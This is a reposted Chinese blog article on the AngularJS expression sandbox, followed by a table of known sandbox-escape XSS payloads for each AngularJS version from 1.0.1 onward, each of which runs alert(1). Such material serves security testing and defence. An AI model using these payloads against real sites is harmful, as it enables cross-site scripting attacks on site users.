Angular使用及其安全问题分析

最新推荐文章于 2023-08-29 16:36:08 发布
最新推荐文章于 2023-08-29 16:36:08 发布
阅读量382 收藏 1
点赞数
分类专栏: 语言 信息安全
原文链接:https://blog.csdn.net/wenrennaoda/article/details/89885722
版权

https://blog.csdn.net/wenrennaoda/article/details/89885722

1、逃逸Payload

     Angular通过“{{expression}}”来作为输出的标志,而对于双括号里面的内容Angular会计计算并输出结果。然而Angular模板表达式会经过沙箱验证,例如:1)不允许使用Function对象;2)不允许使用window对象;3)不允许使用dom对象;4)不允许使用Object对象;5)对obj对象的constructor进行检查,确保其不是Function对象,并且call,apply,bind等方法的调用也是不允许的;6)等等。这些使得直接的javascript语句不能运行,无法进行攻击。

    然而攻击者研究各版本沙箱机制,提出了各版本逃逸Payload,通过这些Payload可对目标网站发动XSS攻击。各版本Payload如下表所示:

AngularJS版本

沙箱逃逸利用有效负载

1.0.1-1.1.5

{{constructor.constructor('alert(1)')()}}

1.2.0-1.2.1

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].

getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2-1.2.5

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6-1.2.18

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).

value,0,'alert(1)')()}}

1.2.19-1.2.23

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].

sort(toString.constructor);}}

1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval ("x='\"+(y='if(!window\\u002ex)

alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0

{{!ready && (ready = true) && (
      !call
      ? $$watchers[0].get(toString.constructor.prototype)
      : (a = apply) &&
        (apply = constructor) &&
        (valueOf = call) &&
        (''+''.toString(
          'F = Function.prototype;' +
          'F.apply = F.a;' +
          'delete F.a;' +
          'delete F.valueOf;' +
          'alert(1);'
        ))
    );}}

1.3.1-1.3.2

{{
    {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf;
    $eval('x=alert(1)//');
}}

1.3.3-1.3.18

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}

1.3.19

{{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
    $eval('x=alert(1)//');
}}

1.3.20

 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.3.0 - 1.5.8

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}

1.5.9 - 1.5.11

 
 

  1. {{

  2. c=''.sub.call;b=''.sub.bind;a=''.sub.apply;

  3.     c.$apply=$apply;c.$eval=b;op=$root.$$phase;

  4.     $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;

  5.     C=c.$apply(c);$root.$$phase=op;$root.$digest=od;

  6.     B=C(b,c,b);$evalAsync("

  7.     astNode=pop();astNode.type='UnaryExpression';

  8.     astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';

  9.     astNode.argument={type:'Identifier',name:'foo'};

  10.     ");

  11.     m1=B($$asyncQueue.pop().expression,null,$root);

  12.     m2=B(C,null,m1);[].push.apply=m2;a=''.sub;

  13.     $eval('a(b.c)');[].push.apply=a;

  14. }}

 

>=1.6.0

{{constructor.constructor('alert(1)')()}}

    从版本1.6开始,Angular完全删除了沙盒

devil8123665
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
angular 最佳实践_Angular安全最佳实践
weixin_26722031的博客
07-30 365
angular 最佳实践Angular is a popular front-end framework made by Google. Like other popular front-end frameworks, it uses a component-based architecture to structure apps. Angular是Google制作的一种流行的前端框架。 与其他流...
Angularjs $http服务的两个request安全问题
07-12 1615
$http服务文档页面
AngularJS中安全性措施
wjxbj的博客
09-02 376
        在使用web应用中,安全性是应该首要考虑的一个问题AngularJS提供了一些辅助机制,用来防护来自两个常见攻击方向的网络攻击。 一.JSON漏洞         当使用一个GET请求获取JSON数组信息的时候(尤其是当这一信息非常敏感,并且需要登录或者授权才能访问时),存在一个很微妙的漏洞。         这个漏洞的形式为:恶意站点使用<SCRIPT>标...
[转发]Angular 安全 —— 使用 JSON 网络令牌(JWT)的身份认证:完全指南
我...你知道吗? 的博客
06-13 2368
最近在网上看了一位大佬译的一篇JWT认证文章非常不错!不多说直接贴. Angular 安全 —— 使用 JSON 网络令牌(JWT)的身份认证:完全指南我们的目标是系统的讨论基于 JWT 的认证设计和实现,衡量取舍不同的设计方案,并将其应用到某个 Angular 应用特定的上下文中。我们将追踪一个 JWT 从被认证服务器创建开始,到它被返回到客户端,再到它被返回到应用服务器的全程,并讨论其中涉及的...
Angular中的安全导航操作符 ( ?. )
zwbHUST的博客
10-19 707
Angular安全导航操作符 (?.) 是一种流畅而便利的方式,用来保护出现在属性路径中 null 和 undefined 值。  举例:The  hero's name is {{Hero.name}} 若name为空时,会报错,导致整个程序崩溃。若改成如下形式: The  hero's name is {{Hero?.name}} 这样即使name为空也不会报错,只是不
Angular ElementRef简介及其使用
12-03
Angular 的口号是 – “一套框架,多种平台。同时适用手机与桌面 (One framework.Mobile & desktop.)”,即 Angular 是支持开发跨平台的应用,比如:Web 应用、移动 Web 应用、原生移动应用和原生...下面我们就来分析
Angular使用MathJax遇到的一些问题
08-28
主要给大家介绍了关于Angular使用MathJax遇到的一些问题,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友下面来一起学习学习吧。
angular十大常见问题
08-31
本文主要介绍了angular十大常见问题,具有很好的参考价值。下面跟着小编一起来看下吧
Angular使用Md5加密的解决方法
08-29
主要介绍了Angular使用Md5加密的解决方法,需要的朋友可以参考下
angular7中的加密、安全操作
yw00yw的博客
07-03 2399
angular中md5的使用 1. 安装依赖 npm install ts-md5 --save 2. 导入 import {Md5} from 'ts-md5'; 3. 使用 Md5.hashStr('需要加密的数据'); 4. 案例 params.set("password", Md5.hashStr(this.password).toString()); 设置参数只能是字符串...
angularSandbox:用于刷 Angular 的通用沙箱
06-17
角沙盒 描述用于刷 Angular 的测试区域
详解AngularJS之$window窗口对象
10-18
本篇文章主要介绍了AngularJS之$window窗口对象,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
angular2-sandbox:一个非常简单的沙箱,可以让您使用 AngularJS 2.0 Alpha 弄脏手
06-08
AngularJS 2 沙盒 一个非常简单的沙箱,可以让您使用 AngularJS 2.0 Alpha 弄脏手。 内容 该存储库包含 AngularJS 2.0(当前为2.0.0-alpha.20 )以及 SystemJS 和 Traceur 运行时的快照。 目前 AngularJS 2.0 依赖于 AtScript 样式的元注释去0.0.87 ,这在 Traceur 0.0.87的annotations选项下得到支持。 这可能会在未来发生变化,具体取决于 TypeScript 的采用和/或 ES7 元注释/装饰器的进展。 还使用在rtts_assert中配置的 AngularJS 2.0 rtts_assert断言模块提供运行时类型检查。 此存储库仅用于演示目的和探索新的 AngularJS 版本。 它不包含任何优化,任务运行器仅用于使用 livereload 引导 Web 服务器
Angular安全专辑之三 —— 授权绕过,利用漏洞控制管理员账户
最新发布
KenkoTech的博客
08-29 1024
管理员用户的邮箱地址受到保护,不能更改为攻击者的邮箱地址,攻击者也就不能通过忘记密码功能获取到管理员权限了。而且由于攻击者此时拥有管理员权限,所以造成的损失将是非常巨大的。,不同的用户拥有不同的权限。相对来说管理员账户所对应的权限是极高的,它可以修改当前用户或者比它权限低的账户信息。注意:管理员用户可以没有任何限制的修改邮箱地址,所以即便是邮箱的域名被修改(@example.com -> @xxx.com)也是合法的。角色的经过身份验证的用户可以结合更新用户信息的方法和。比如我的项目所遇到的问题,具有。
angular 注入器配置_使用策略模式升级Angular组件API
weixin_39902598的博客
01-02 103
原文链接​medium.com原作者:Itay Oded​medium.com译者:知乎用户​www.zhihu.com策略模式是常见的解决软件问题的方案之一。在本文中,我们将学习什么是策略模式,以及如何将策略模式应用于 Angular 组件中。The Problem存在这样一个场景:当你需要使用一个公共组件时,因为某些特殊的用例需要对这个组件进行一些修改,这个组件可能是一个列表一个表格或是一个展...
angular环境安装
雨云21的博客
04-20 7020
1.在安装angular之前,需要安装Node.js Node.js官网:https://nodejs.org/en/ 安装Node.js非常简单,下载安装包后直接运行,一直下一步,然后点完成就行了 检测:进入命令控制台,输入node -v和npm -v查看版本信息 2.安装angular cli 以管理员身份运行命令提示符,输入安装命令 npm install -g @angular/cli ...
angularjs 彻底的异步解决
guduyishuai的博客
10-27 8487
angularjs的异步处理的真的很不错。基于消息广播的方式,并且可以向上传递,基本上解决了不同模块,不同controller之间不方便异步的问题。         场景一:通过回调函数进行异步操作(该情况下不用消息广播的机制)         这种情况的特点是直接传递一个回调函数给异步操作就可以了,等异步操作完执行回调。         比如:controller通过server异
ionic使用angular语言打包apk之后解决跨域问题
04-19
在打包apk后,ionic使用angular语言,遇到跨域问题可以在项目的根目录下添加一个文件:proxy.conf.json,内容如下: { "/api": { "target": "http://example.com", "secure": false } } 其中,/api是指我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值